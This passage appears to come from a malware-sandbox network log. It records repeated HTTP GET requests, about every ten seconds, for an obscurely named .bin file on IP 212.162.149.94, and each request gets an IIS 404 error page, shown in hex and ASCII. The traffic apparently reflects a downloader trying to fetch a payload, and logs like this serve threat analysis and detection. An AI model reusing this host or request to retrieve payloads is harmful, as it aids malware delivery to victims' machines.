          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:29:45.073555946 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:29:55.082875967 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:29:55.205708981 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:29:57 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:29:55.205722094 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:30:05.207848072 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:30:05.335052967 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:30:07 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:30:05.335078955 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:30:15.348758936 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:30:15.471740961 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:30:17 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:30:15.471750975 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:30:25.494669914 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:30:25.617069960 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:30:27 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:30:25.617080927 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:30:35.637134075 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:30:35.763609886 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:30:37 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:30:35.763623953 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:30:45.770916939 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:30:45.893686056 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:30:47 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:30:45.893698931 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:30:55.913311005 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:30:56.036700010 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:30:58 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:30:56.036712885 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:31:06.051976919 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:31:06.175168991 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:31:08 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
